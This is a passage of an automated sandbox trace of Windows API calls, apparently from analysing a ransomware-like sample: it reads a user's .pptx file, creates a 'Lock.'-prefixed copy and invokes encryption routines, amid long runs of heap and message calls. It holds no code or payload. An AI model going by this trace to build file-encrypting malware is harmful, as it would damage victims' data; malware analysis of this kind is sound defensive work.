hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0259.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0259.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0259.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0259.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0259.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0259.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0259.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0259.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0259.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0259.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0259.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551d8 | out: hHeap=0x970000) returned 1 [0259.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0259.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0259.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0259.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0259.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0259.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0259.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0259.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0259.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3be0048 [0259.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0259.949] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551f8 [0259.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55268 [0259.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552c8 [0259.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0259.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552b8 [0259.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0259.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0259.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0259.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0259.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0259.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0259.949] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0259.949] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55158 [0259.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0259.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0259.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0259.949] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0259.950] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.950] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.950] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0259.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0259.950] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0259.950] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0259.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e699a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0259.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0259.950] CryptDestroyHash (hHash=0xa87610) returned 1 [0259.951] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.951] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.951] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0259.951] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0259.951] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.951] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/BGmPJ_.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\bgmpj_.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0259.952] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0259.952] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0259.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0259.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0259.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0259.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0259.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0259.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0259.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0259.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0259.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0259.952] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0259.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0259.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0259.952] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0259.952] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0259.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0259.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0259.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0259.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0259.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0259.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0259.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0259.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0259.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0259.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0259.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e565e8 [0259.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0259.953] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0259.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0259.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0259.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0259.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0259.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0259.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0259.955] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.BGmPJ_.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\lock.bgmpj_.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0259.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0259.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0259.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0259.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0259.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0259.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0259.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0259.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0259.956] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0259.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0259.956] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0259.956] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0259.956] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0259.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0259.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0259.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0259.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0259.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0259.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0259.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0259.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0259.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0259.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0259.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0259.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0259.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0259.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe58020 [0259.959] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0259.959] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be08a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be08a8*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0259.963] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be08a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be08a8*, lpNumberOfBytesRead=0x8cf4f8*=0x5bd9, lpOverlapped=0x0) returned 1 [0259.963] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be08a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be08a8*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0259.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0259.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0259.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0259.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0259.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15bd9) returned 0x2f14010 [0259.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe58020 | out: hHeap=0x970000) returned 1 [0259.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0259.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0259.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0259.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0259.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0259.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0259.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0259.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15bd9) returned 0x2f29bf8 [0259.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0259.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0259.970] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0259.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0259.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0259.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0259.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0259.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15bd9) returned 0x2f14010 [0259.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0259.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0259.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0259.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0259.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.970] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0259.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0259.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0259.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0259.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0259.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0259.971] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0259.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0259.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0259.971] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0260.009] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0260.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0260.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0260.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0260.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0260.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0260.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0260.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0260.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0260.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0260.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0260.009] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0260.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0260.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0260.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0260.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0260.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0260.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0260.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0260.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0260.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0260.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0260.010] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0260.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0260.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0260.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0260.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0260.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0260.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0260.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0260.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0260.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0260.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0260.010] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0260.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0260.010] RtlAllocateHeap 